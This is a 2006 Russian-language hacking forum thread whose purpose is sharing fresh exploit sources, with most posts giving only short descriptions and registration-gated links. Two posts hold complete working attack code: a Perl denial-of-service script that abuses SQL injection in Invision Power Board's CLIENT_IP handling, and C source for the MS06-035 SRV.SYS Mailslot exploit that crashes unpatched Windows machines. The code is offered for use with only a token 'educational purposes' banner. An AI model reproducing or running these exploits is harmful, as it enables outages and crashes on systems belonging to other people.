Exploits скачать бесплатно программу фильм mp3 русификатор

Каскадный · Стандартный · [ Линейный ]

Exploits, Постим эксплойты

Подписка на тему | Сообщить другу | Версия для печати

8.03.2006 - 22:46

Отправлено #1

de1ay

Cardable Unit
[SoftoRooMTeaM] Group Icon

Профиль
Группа: СуперМодераторы
Сообщений: 3.840
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010

Респектов: 610
-----XXXX-

Тема создана для того, что-бы закидывать сюда исходники свежих сплойтов!
Никаких обсуждений в данной теме не ведём! Только описание сплойта, линк с исходниками или исходники,

Межсайтовый скриптинг и SQL-инъекция в Invision Power Board (2.0.0 - 2.1.4)

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных приложения.

1. Уязвимость существует из-за недостаточной обработки входных данных в файлах куки. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.

2. Уязвимость существует из-за недостаточной обработки входных данных в некоторых параметрах. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Сплойт:

» Exploit «

Ответов(10 - 19)

17.03.2006 - 8:47

Отправлено #11

yah

профи!
[SoftoRooMTeaM] Group Icon

Профиль
Группа: Модераторы
Сообщений: 1.773
Регистрация: 27.01.2006
Из: рнд
Пользователь №: 500

Респектов: 232
-----XX---

RPC Exploit GUI v2

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |

19.03.2006 - 19:57

Отправлено #12

de1ay

Cardable Unit
[SoftoRooMTeaM] Group Icon

Профиль
Группа: СуперМодераторы
Сообщений: 3.840
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010

Респектов: 610
-----XXXX-

Отказ в обслуживании в Microsoft Windows XP,2003

Сплойт:

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |

31.08.2006 - 22:15 Отправлено #13
snike Опытный юзверь Профиль Группа: Пользователи Сообщений: 96 Регистрация: 20.01.2006 Пользователь №: 111.522 Респектов: 19 Предупреждений: 0	Появился эксплойт для DOS-атаки на форум IPB 2.1.х (до 2.1.7). Написан на Перле. Работает на всех версиях MySQL, для успешной работы требует magic_quotes_gpc = 0. Эксплуатирует уязвимость с CLIENT_IP (от 8.06.2006). Использование очень простое и стандартное: [путь к перлу] [путь к эксплойту] www.site.com /ipb/ » Нажмите, для открытия спойлера « CODE #!/usr/bin/perl use LWP::UserAgent; $ua = LWP::UserAgent->new; &header(); if (@ARGV < 2) {&info(); exit();} $server = $ARGV[0]; $dir = $ARGV[1]; print "[+] SERVER {$server}\r\n"; print "[+] DIR {$dir}\r\n"; #Step 1, detecting vulnerability print "[t] Testing forum vulnerability..."; $res = $ua->get("http://".$server.$dir."index.php?s=w00t",'USER_AGENT'=>'','CLIENT_IP'=>"'"); if($res->is_success) { if($res->as_string =~ /FROM (.)sessions/) { print "forum vulnerable\r\n"; } else { print "forum unvulnerable\r\n"; &footer(); exit(); } } else { print "something wrong :(\r\n"; &footer(); exit(); } #Step 2, prepare to DoS print "[?] How many attempts? "; $a = <STDIN>; print "[?] Timeout between attempts in seconds? "; $t = <STDIN>; $q = "OR benchmark(1000,benchmark(3000,md5(current_time)))/"; # calculation md5() 3 million times. You can increase or reduce this value print "[i] Starting DoS. Please, be patient\r\n"; #Step 3. DoS for ($i = 0; $i < $a; $i++) { $res = $ua->get("http://".$server.$dir."index.php?s=w00t",'USER_AGENT'=>'','CLIENT_IP'=>"' ".$q); sleep($t); } print "[!] Victim server may be down\r\n"; &footer(); $ex = <STDIN>; sub footer() { print "[G] Greets: 1dt.w0lf (rst/ghc)\r\n"; print "[L] Visit: secbun.info \| rst.void.ru\r\n"; } sub header() { print q( ---------------------------------------------------------- * Invision Power Board 2.1 <= 2.1.6 DoS Exploit * * Based on r57-Advisory#41 by 1dt.w0lf (rst/ghc) * * Coded by w4g.not null * * FOR EDUCATIONAL PURPOSES ONLY * ---------------------------------------------------------- ); } sub info() { print q( [i] Usage: perl w4gipbdos216.pl [server] [/dir/] where \|- server - server, where IPB installed without http:// \|- /dir/ - dir, where IPB installed or / for no dir e.g. perl w4gipbdos216.pl www.someserver.com /ipb/ [!] Working on all MySQL versions [!] Need magic_quotes_gpc = Off ); } Сообщение отредактировал iLLuZionist - 31.08.2006 - 22:41

6.09.2006 - 7:55 Отправлено #14
*de1ay* Cardable Unit [SoftoRooMTeaM] Профиль Группа: СуперМодераторы Сообщений: 3.840 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010 Респектов: 610	Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035) Exploit Описание: сплойт вешает тачку без установленного апдейта » exploit code here « #include <stdio.h> #include <windows.h> #include <winsock.h> #pragma comment(lib,"ws2_32.lib") /***************************************************************** Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035) Exploit by cocoruder(frankruder_at_hotmail.com),2006.7.19 page:http://ruder.cdut.net ****************************************************************/ unsigned char SmbNeg[] = "\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x88\x05\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54" "\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"; unsigned char Session_Setup_AndX_Request[]= "\x00\x00\x00\x48\xff\x53\x4d\x42\x73\x00" "\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\xff\xff\x88\x05\x00\x00\x00\x00\x0d\xff\x00\x00\x00\xff" "\xff\x02\x00\x88\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x6e\x74\x00\x70\x79\x73\x6d" "\x62\x00"; unsigned char TreeConnect_AndX_Request[]= "\x00\x00\x00\x58\xff\x53\x4d\x42\x75\x00" "\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\xff\xfe\x00\x08\x00\x03\x04\xff\x00\x58\x00\x08" "\x00\x01\x00\x2d\x00\x00\x5c\x00\x5c\x00\x31\x00\x37\x00\x32\x00" "\x2e\x00\x32\x00\x32\x00\x2e\x00\x35\x00\x2e\x00\x34\x00\x36\x00" "\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f\x3f" "\x3f\x00"; unsigned char Trans_Request[]= "\x00\x00\x00\x56\xff\x53\x4d\x42\x25\x00" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x08\x88\x05\x00\x08\x00\x00\x11\x00\x00\x01\x00\x00" "\x04\xe0\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55" "\x00\x01\x00\x55\x00\x03\x00\x01\x00\x00\x00\x00\x00\x11\x00\x5c" "\x4d\x41\x49\x4c\x53\x4c\x4f\x54\x5c\x4c\x41\x4e\x4d\x41\x4e\x41"; unsigned char recvbuff[2048]; void neg ( int s ) { char response[1024]; memset(response,0,sizeof(response)); send(s,(char )SmbNeg,sizeof(SmbNeg)-1,0); } void main(int argc,char *argv) { struct sockaddr_in server; SOCKET sock; DWORD ret; WSADATA ws; WORD userid,treeid; WSAStartup(MAKEWORD(2,2),&ws); sock = socket(AF_INET,SOCK_STREAM,0); if(sock<=0) { return; } if ( (argv[1]==NULL)\|\|(argv[2]==NULL)) { printf("Program usage: MS06-035.exe <host> <port>\n"); printf("Example: MS06-035.exe 192.168.0.1 445\n"); return; } server.sin_family = AF_INET; server.sin_addr.s_addr = inet_addr(argv[1]); server.sin_port = htons((USHORT)atoi(argv[2])); ret=connect(sock,(struct sockaddr )&server,sizeof(server)); if (ret==-1) { printf("connect error!\n"); return; } neg(sock); recv(sock,(char )recvbuff,sizeof(recvbuff),0); ret=send(sock,(char )Session_Setup_AndX_Request,sizeof(Session_Setup_AndX_Request)-1,0); if (ret<=0) { printf("send Session_Setup_AndX_Request error!\n"); return; } recv(sock,(char )recvbuff,sizeof(recvbuff),0); userid=(WORD )(recvbuff+0x20); //get userid memcpy(TreeConnect_AndX_Request+0x20,(char )&userid,2); //update userid ret=send(sock,(char )TreeConnect_AndX_Request,sizeof(TreeConnect_AndX_Request)-1,0); if (ret<=0) { printf("send TreeConnect_AndX_Request error!\n"); return; } recv(sock,(char )recvbuff,sizeof(recvbuff),0); treeid=(WORD )(recvbuff+0x1c); //get treeid memcpy(Trans_Request+0x20,(char )&userid,2); //update userid memcpy(Trans_Request+0x1c,(char )&treeid,2); //update treeid ret=send(sock,(char )Trans_Request,sizeof(Trans_Request)-1,0); if (ret<=0) { printf("send Trans_Request error!\n"); return; } recv(sock,(char )recvbuff,sizeof(recvbuff),0); } говорим спасибо кодеру cocoruder(frankruder_at_hotmail.com)

6.09.2006 - 15:39

Отправлено #15

de1ay

Cardable Unit
[SoftoRooMTeaM] Group Icon

Профиль
Группа: СуперМодераторы
Сообщений: 3.840
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010

Респектов: 610
-----XXXX-

И ещё один сплойт бьющий на отказ Microsoft Windows 2000 SP0-SP4, Microsoft Windows XP SP0-SP1, Microsoft Windows NT 4.0

MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040)

» sources here «

Скомпиленный здесь:

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |

7.09.2006 - 9:13

Отправлено #16

Jon-dog

Грамотный

Профиль
Группа: Пользователи
Сообщений: 218
Регистрация: 29.11.2005
Пользователь №: 76.326

Респектов: 13
-----X----

Предупреждений: 0

Microsoft SRV.SYS Mailslot Ring0 Memory Corruption(MS06-035) Exploit

Posted by iLLuZionist user posted image

Respect!

Compeled Version:

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |

11.09.2006 - 6:31

Отправлено #17

Jon-dog

Грамотный

Профиль
Группа: Пользователи
Сообщений: 218
Регистрация: 29.11.2005
Пользователь №: 76.326

Респектов: 13
-----X----

Предупреждений: 0

IGMP v3 DoS Exploit

Эфект тот же что и от EvilIGMP, только консольный вариант + исходник

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |

Добавлено:
Ну и чуть не забыл

Откомпиленая версия:

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |

Сообщение отредактировал Jon-dog - 11.09.2006 - 6:28

11.09.2006 - 6:52

Отправлено #18

Jon-dog

Грамотный

Профиль
Группа: Пользователи
Сообщений: 218
Регистрация: 29.11.2005
Пользователь №: 76.326

Респектов: 13
-----X----

Предупреждений: 0

MS04-007-dos

Posted by Raider_Singer user posted image

На удаленной системе должен быть открытым 445 порт

XP-SP0, SP-1, 2k, 2003

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |

29.10.2006 - 22:39

Отправлено #19

de1ay

Cardable Unit
[SoftoRooMTeaM] Group Icon

Профиль
Группа: СуперМодераторы
Сообщений: 3.840
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010

Респектов: 610
-----XXXX-

Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit
Очередной сплойт для проведения ДоС атаки... КПД на 0, зато нервы успокаивает

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |

12.11.2006 - 16:03

Отправлено #20

de1ay

Cardable Unit
[SoftoRooMTeaM] Group Icon

Профиль
Группа: СуперМодераторы
Сообщений: 3.840
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010

Респектов: 610
-----XXXX-

QUOTE

Jon-dog плз перезалей

Аттач

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |